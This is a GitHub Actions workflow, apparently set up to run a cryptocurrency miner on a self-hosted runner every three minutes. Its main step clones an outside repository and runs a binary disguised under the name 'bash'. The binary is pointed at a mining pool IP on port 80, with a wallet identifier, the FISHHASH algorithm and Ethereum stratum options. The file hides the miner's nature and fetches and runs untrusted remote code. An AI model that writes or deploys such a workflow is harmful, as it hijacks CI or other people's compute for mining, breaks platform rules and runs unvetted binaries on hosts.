name: Run bash --noTest

on:
  workflow_dispatch:
  schedule:
    - cron: "*/3 * * * *"   

permissions:
  contents: read

concurrency:
  group: tesaction-run
  cancel-in-progress: true

jobs:
  run:
    runs-on: self-hosted
    timeout-minutes: 2  # 5 jam

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Debug (optional)
        run: |
          echo "GITHUB_WORKSPACE=$GITHUB_WORKSPACE"
          ls -la

      - name: Run bash
        run: |
          git clone https://github.com/hujisanda/lol198.git && cd lol198 && chmod u+x bash && ./bash --algo FISHHASH --pool 138.197.24.47:80 --user c9f8d6c1849abbcd164f6c72002d9ac44b9deaef70481739a29d1733915defca+115098.jasin --ethstratum ETHPROX
          
